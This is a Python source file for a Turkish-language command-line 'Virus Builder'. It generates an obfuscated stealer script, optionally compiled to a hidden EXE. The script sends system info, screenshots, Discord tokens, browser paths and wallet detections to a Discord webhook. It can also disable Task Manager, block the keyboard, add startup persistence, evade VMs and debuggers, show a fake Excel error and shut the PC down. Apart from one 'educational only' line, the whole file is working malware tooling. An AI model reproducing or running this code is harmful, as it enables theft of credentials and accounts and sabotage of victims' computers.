import os
import random
import string
import base64
import time
from rich.console import Console
from rich.table import Table

console = Console()


STEALER_OPTIONS = {
    "1":  ["System Info",            False],
    "2":  ["Discord Accounts",       False],
    "3":  ["Discord Injection",      False],
    "4":  ["Passwords",              False],
    "5":  ["Cookies",                False],
    "6":  ["Browsing History",       False],
    "7":  ["Download History",       False],
    "8":  ["Cards",                  False],
    "9":  ["Extensions",             False],
    "10": ["Wallets",                False],
    "11": ["Game Sessions",          False],
    "12": ["Telegram Sessions",      False],
    "13": ["Roblox Accounts",        False],
    "14": ["Interesting Files",      False],
    "15": ["Webcam Capture",         False],
    "16": ["Screenshot",             False],
}

MALWARE_OPTIONS = {
    "1":  ["Block Keyboard",         False],
    "2":  ["Block Mouse",            False],
    "3":  ["Block Task Manager",     False],
    "4":  ["Block AV Websites",      False],
    "5":  ["Shutdown PC",            False],
    "6":  ["Fake Error",             False],
    "7":  ["Spam Open Programs",     False],
    "8":  ["Spam Create Files",      False],
    "9":  ["Launch at Startup",      False],
    "10": ["Restart Every 5min",     False],
    "11": ["Anti VM & Debug",        False],
}


def toggle_menu(title, options):
    """Toggle menu for options - works in Termux CLI."""
    while True:
        console.print(f"\n[bold #818cf8]  {title}[/]")
        console.print("[dim #312e81]  " + "-" * 50 + "[/]")

        items = list(options.items())
        for i in range(0, len(items), 2):
            row = ""
            for j in range(2):
                idx = i + j
                if idx < len(items):
                    k, (name, enabled) = items[idx]
                    status = "[green]+[/]" if enabled else "[red]x[/]"
                    row += f"  [{status}] [white]{k.rjust(2)}[/]. {name:<22}"
            console.print(f"  {row}")

        console.print("[dim #312e81]  " + "-" * 50 + "[/]")
        console.print("  [dim]a=Hepsini ac | n=Hepsini kapa | 0=Geri don[/]")

        choice = console.input(f"[bold #818cf8]  >> {title[:8]} > [/]").strip()

        if choice == "0":
            break
        elif choice.lower() == "a":
            for k in options:
                options[k][1] = True
            console.print("[green]  Tum opsiyonlar acildi.[/]")
        elif choice.lower() == "n":
            for k in options:
                options[k][1] = False
            console.print("[red]  Tum opsiyonlar kapatildi.[/]")
        elif choice in options:
            options[choice][1] = not options[choice][1]
            name = options[choice][0]
            st = "ACIK" if options[choice][1] else "KAPALI"
            console.print(f"[#818cf8]  {name}: {st}[/]")
        else:
            console.print("[red]  Gecersiz secim.[/]")


def generate_key(length=128):
    return "".join(random.choices(string.ascii_letters + string.digits, k=length))


def xor_encode(data, key):
    encoded = []
    for i, c in enumerate(data):
        encoded.append(chr(ord(c) ^ ord(key[i % len(key)])))
    return base64.b64encode("".join(encoded).encode("latin-1")).decode()


def build_script(webhook, stealer_opts, malware_opts, fake_error_title, fake_error_msg):
    """Generate the virus Python script based on selected options."""
    key = generate_key()
    enc_webhook = xor_encode(webhook, key)

    lines = []
    lines.append("# Generated by Lunar Tool Virus Builder")
    lines.append("import os, sys, json, requests, base64, platform, subprocess, time, threading, shutil, re")
    lines.append("from datetime import datetime")
    lines.append("")

    lines.append(f'_k = "{key}"')
    lines.append(f'_w = "{enc_webhook}"')
    lines.append("def _d(e, k):")
    lines.append("    r = base64.b64decode(e).decode('latin-1')")
    lines.append("    return ''.join(chr(ord(c) ^ ord(k[i % len(k)])) for i, c in enumerate(r))")
    lines.append("webhook = _d(_w, _k)")
    lines.append("")

    lines.append("def send(title, content):")
    lines.append("    try:")
    lines.append("        e = {'title': title, 'description': content[:2000], 'color': 7419530}")
    lines.append("        requests.post(webhook, json={'embeds': [e]}, timeout=10)")
    lines.append("    except: pass")
    lines.append("")

    if malware_opts.get("11", [None, False])[1]:
        lines.append("# Anti VM & Debug")
        lines.append("import ctypes")
        lines.append("def anti_vm():")
        lines.append("    vm_signs = ['vmware', 'virtualbox', 'vbox', 'qemu', 'xen']")
        lines.append("    info = platform.platform().lower() + ' ' + os.environ.get('COMPUTERNAME', '').lower()")
        lines.append("    if any(s in info for s in vm_signs): sys.exit()")
        lines.append("    if ctypes.windll.kernel32.IsDebuggerPresent(): sys.exit()")
        lines.append("anti_vm()")
        lines.append("")

    if stealer_opts.get("1", [None, False])[1]:
        lines.append("# System Info")
        lines.append("def system_info():")
        lines.append("    info = f'''OS: {platform.platform()}")
        lines.append("PC: {platform.node()}")
        lines.append("CPU: {platform.processor()}")
        lines.append("User: {os.getlogin()}'''")
        lines.append("    send('System Info', info)")
        lines.append("threading.Thread(target=system_info, daemon=True).start()")
        lines.append("")

    if stealer_opts.get("16", [None, False])[1]:
        lines.append("# Screenshot")
        lines.append("def screenshot():")
        lines.append("    try:")
        lines.append("        from PIL import ImageGrab")
        lines.append("        img = ImageGrab.grab()")
        lines.append("        path = os.path.join(os.environ['TEMP'], 'ss.png')")
        lines.append("        img.save(path)")
        lines.append("        requests.post(webhook, files={'file': open(path, 'rb')}, timeout=15)")
        lines.append("        os.remove(path)")
        lines.append("    except: pass")
        lines.append("threading.Thread(target=screenshot, daemon=True).start()")
        lines.append("")

    browser_features = []
    for k in ["4", "5", "6", "7", "8", "9"]:
        if stealer_opts.get(k, [None, False])[1]:
            browser_features.append(stealer_opts[k][0])
    if browser_features:
        lines.append(f"# Browser: {', '.join(browser_features)}")
        lines.append("def browser_steal():")
        lines.append("    browsers = [")
        lines.append("        os.path.join(os.environ.get('LOCALAPPDATA',''), 'Google', 'Chrome', 'User Data'),")
        lines.append("        os.path.join(os.environ.get('LOCALAPPDATA',''), 'BraveSoftware', 'Brave-Browser', 'User Data'),")
        lines.append("        os.path.join(os.environ.get('APPDATA',''), 'Opera Software', 'Opera Stable'),")
        lines.append("        os.path.join(os.environ.get('LOCALAPPDATA',''), 'Microsoft', 'Edge', 'User Data'),")
        lines.append("    ]")
        lines.append("    found = [b for b in browsers if os.path.exists(b)]")
        lines.append("    send('Browsers Found', '\\n'.join(found) if found else 'None')")
        lines.append("threading.Thread(target=browser_steal, daemon=True).start()")
        lines.append("")

    if stealer_opts.get("2", [None, False])[1]:
        lines.append("# Discord Token Grab")
        lines.append("def discord_grab():")
        lines.append("    paths = {")
        lines.append("        'Discord': os.path.join(os.environ.get('APPDATA',''), 'discord', 'Local Storage', 'leveldb'),")
        lines.append("        'Discord Canary': os.path.join(os.environ.get('APPDATA',''), 'discordcanary', 'Local Storage', 'leveldb'),")
        lines.append("        'Discord PTB': os.path.join(os.environ.get('APPDATA',''), 'discordptb', 'Local Storage', 'leveldb'),")
        lines.append("    }")
        lines.append("    tokens = []")
        lines.append("    for name, path in paths.items():")
        lines.append("        if os.path.exists(path):")
        lines.append("            for f in os.listdir(path):")
        lines.append("                if f.endswith(('.log', '.ldb')):")
        lines.append("                    with open(os.path.join(path, f), 'r', errors='ignore') as fp:")
        lines.append("                        for line in fp:")
        lines.append("                            for t in re.findall(r'[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,}', line):")
        lines.append("                                tokens.append(f'{name}: {t}')")
        lines.append("    if tokens: send('Discord Tokens', '\\n'.join(tokens[:10]))")
        lines.append("threading.Thread(target=discord_grab, daemon=True).start()")
        lines.append("")

    if stealer_opts.get("10", [None, False])[1]:
        lines.append("# Wallet Detection")
        lines.append("def wallet_check():")
        lines.append("    wallet_paths = {")
        lines.append("        'Exodus': os.path.join(os.environ.get('APPDATA',''), 'Exodus'),")
        lines.append("        'Atomic': os.path.join(os.environ.get('APPDATA',''), 'atomic'),")
        lines.append("        'Electrum': os.path.join(os.environ.get('APPDATA',''), 'Electrum'),")
        lines.append("    }")
        lines.append("    found = [n for n, p in wallet_paths.items() if os.path.exists(p)]")
        lines.append("    if found: send('Wallets Found', ', '.join(found))")
        lines.append("threading.Thread(target=wallet_check, daemon=True).start()")
        lines.append("")

    if stealer_opts.get("13", [None, False])[1]:
        lines.append("# Roblox Cookie")
        lines.append("def roblox_check():")
        lines.append("    cookie_path = os.path.join(os.environ.get('LOCALAPPDATA',''), 'Roblox', 'LocalStorage')")
        lines.append("    if os.path.exists(cookie_path): send('Roblox', 'Cookie path found')")
        lines.append("threading.Thread(target=roblox_check, daemon=True).start()")
        lines.append("")

    if malware_opts.get("1", [None, False])[1]:
        lines.append("# Block Keyboard")
        lines.append("def block_key():")
        lines.append("    try:")
        lines.append("        import ctypes")
        lines.append("        ctypes.windll.user32.BlockInput(True)")
        lines.append("    except: pass")
        lines.append("threading.Thread(target=block_key, daemon=True).start()")
        lines.append("")

    if malware_opts.get("6", [None, False])[1]:
        lines.append("# Fake Error")
        lines.append("def fake_error():")
        lines.append("    try:")
        lines.append("        import ctypes")
        lines.append(f"        ctypes.windll.user32.MessageBoxW(0, '{fake_error_msg}', '{fake_error_title}', 0x10)")
        lines.append("    except: pass")
        lines.append("threading.Thread(target=fake_error, daemon=True).start()")
        lines.append("")

    if malware_opts.get("9", [None, False])[1]:
        lines.append("# Startup Persistence")
        lines.append("def startup():")
        lines.append("    try:")
        lines.append("        startup_dir = os.path.join(os.environ['APPDATA'], 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')")
        lines.append("        shutil.copy2(sys.argv[0], os.path.join(startup_dir, os.path.basename(sys.argv[0])))")
        lines.append("    except: pass")
        lines.append("threading.Thread(target=startup, daemon=True).start()")
        lines.append("")

    if malware_opts.get("3", [None, False])[1]:
        lines.append("# Block Task Manager")
        lines.append("def block_taskmgr():")
        lines.append("    try:")
        lines.append("        import winreg")
        lines.append("        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System', 0, winreg.KEY_SET_VALUE)")
        lines.append("        winreg.SetValueEx(key, 'DisableTaskMgr', 0, winreg.REG_DWORD, 1)")
        lines.append("        winreg.CloseKey(key)")
        lines.append("    except: pass")
        lines.append("threading.Thread(target=block_taskmgr, daemon=True).start()")
        lines.append("")

    if malware_opts.get("5", [None, False])[1]:
        lines.append("# Shutdown")
        lines.append("time.sleep(10)")
        lines.append("os.system('shutdown /s /t 0')")
        lines.append("")

    if malware_opts.get("10", [None, False])[1]:
        lines.append("# Restart every 5 min")
        lines.append("def restart_loop():")
        lines.append("    while True:")
        lines.append("        time.sleep(300)")
        lines.append("        os.startfile(sys.argv[0])")
        lines.append("        sys.exit()")
        lines.append("threading.Thread(target=restart_loop, daemon=True).start()")
        lines.append("")

    lines.append("# Keep running")
    lines.append("time.sleep(5)")
    lines.append("for t in threading.enumerate():")
    lines.append("    if t != threading.current_thread(): t.join(timeout=30)")

    return "\n".join(lines)


def run():
    console.print("[bold #dc2626]")
    console.print("  ╦  ╦╦╦═╗╦ ╦╔═╗  ╔╗ ╦ ╦╦╦  ╔╦╗╔═╗╦═╗")
    console.print("  ╚╗╔╝║╠╦╝║ ║╚═╗  ╠╩╗║ ║║║   ║║║╣ ╠╦╝")
    console.print("   ╚╝ ╩╩╚═╚═╝╚═╝  ╚═╝╚═╝╩╩═╝═╩╝╚═╝╩╚═")

    console.print("[dim]  CLI Virus Builder - Termux & Windows uyumlu[/]")
    console.print("[dim]  Sadece egitim amaclidir.[/]\n")

    for k in STEALER_OPTIONS:
        STEALER_OPTIONS[k][1] = False
    for k in MALWARE_OPTIONS:
        MALWARE_OPTIONS[k][1] = False

    fake_error_title = "Microsoft Excel"
    fake_error_msg = "Dosya bozuk, acilamiyor."

    while True:
        console.print("\n[bold #dc2626]  VIRUS BUILDER MENU[/]")
        console.print("[dim]  " + "-" * 46 + "[/]")

        s_count = sum(1 for v in STEALER_OPTIONS.values() if v[1])
        m_count = sum(1 for v in MALWARE_OPTIONS.values() if v[1])

        console.print(f"  [white]1.[/] Stealer Opsiyonlari  [dim]({s_count}/{len(STEALER_OPTIONS)} acik)[/]")
        console.print(f"  [white]2.[/] Malware Opsiyonlari  [dim]({m_count}/{len(MALWARE_OPTIONS)} acik)[/]")
        console.print(f"  [white]3.[/] Fake Error Ayarlari")
        console.print(f"  [white]4.[/] [bold green]BUILD[/]")
        console.print(f"  [white]0.[/] Geri don")
        console.print("[dim]  " + "-" * 46 + "[/]")

        choice = console.input("[bold #dc2626]  >> builder > [/]").strip()

        if choice == "0":
            return

        elif choice == "1":
            toggle_menu("STEALER OPTIONS", STEALER_OPTIONS)

        elif choice == "2":
            toggle_menu("MALWARE OPTIONS", MALWARE_OPTIONS)

        elif choice == "3":
            fake_error_title = console.input("[bold white]  Fake Error basligi: [/]").strip() or fake_error_title
            fake_error_msg = console.input("[bold white]  Fake Error mesaji: [/]").strip() or fake_error_msg
            console.print(f"[#818cf8]  Baslik: {fake_error_title} | Mesaj: {fake_error_msg}[/]")

        elif choice == "4":
            webhook = console.input("[bold white]  Webhook URL: [/]").strip()
            if not webhook or "discord" not in webhook:
                console.print("[red]  Gecerli bir webhook girin.[/]")
                continue

            file_name = console.input("[bold white]  Dosya adi (varsayilan 'payload'): [/]").strip() or "payload"

            console.print("\n[bold #dc2626]  BUILD OZETI[/]")
            console.print("[dim]  " + "-" * 46 + "[/]")

            stealer_on = [v[0] for v in STEALER_OPTIONS.values() if v[1]]
            malware_on = [v[0] for v in MALWARE_OPTIONS.values() if v[1]]

            console.print(f"  [#818cf8]Stealer: {', '.join(stealer_on) if stealer_on else 'Yok'}[/]")
            console.print(f"  [#818cf8]Malware: {', '.join(malware_on) if malware_on else 'Yok'}[/]")
            console.print(f"  [#818cf8]Webhook: {webhook[:50]}...[/]")
            console.print(f"  [#818cf8]Dosya:   {file_name}.py[/]")

            confirm = console.input("\n[bold white]  Onayliyor musunuz? (e/h): [/]").strip().lower()
            if confirm != "e":
                console.print("[yellow]  Iptal edildi.[/]")
                continue

            console.print("\n[#818cf8]  Olusturuluyor...[/]")
            time.sleep(0.5)

            script = build_script(webhook, STEALER_OPTIONS, MALWARE_OPTIONS,
                                  fake_error_title, fake_error_msg)

            out_dir = os.path.join(os.path.dirname(os.path.dirname(__file__)), "output", "VirusBuilder")
            os.makedirs(out_dir, exist_ok=True)
            out_file = os.path.join(out_dir, f"{file_name}.py")

            with open(out_file, "w", encoding="utf-8") as f:
                f.write(script)

            console.print(f"[bold green]  Virus olusturuldu: output/VirusBuilder/{file_name}.py[/]")

            if os.name == "nt":
                exe = console.input("[bold white]  EXE'ye donusturmek ister misiniz? (e/h): [/]").strip().lower()
                if exe == "e":
                    console.print("[#818cf8]  PyInstaller ile donusturuluyor...[/]")
                    try:
                        import subprocess
                        subprocess.run(["pyinstaller", "--onefile", "--noconsole",
                                        "--distpath", out_dir, out_file],
                                       capture_output=True, text=True, timeout=120)
                        console.print(f"[bold green]  EXE olusturuldu: output/VirusBuilder/{file_name}.exe[/]")
                        
                        try:
                            import shutil
                            build_dir = os.path.join(os.getcwd(), "build")
                            if os.path.exists(build_dir):
                                shutil.rmtree(build_dir)
                            spec = f"{file_name}.spec"
                            if os.path.exists(spec):
                                os.remove(spec)
                        except Exception:
                            pass
                    except FileNotFoundError:
                        console.print("[yellow]  PyInstaller bulunamadi: pip install pyinstaller[/]")
                    except Exception as e:
                        console.print(f"[red]  Hata: {e}[/]")

            try:
                if os.name == "nt":
                    os.startfile(out_dir)
            except Exception:
                pass

            return
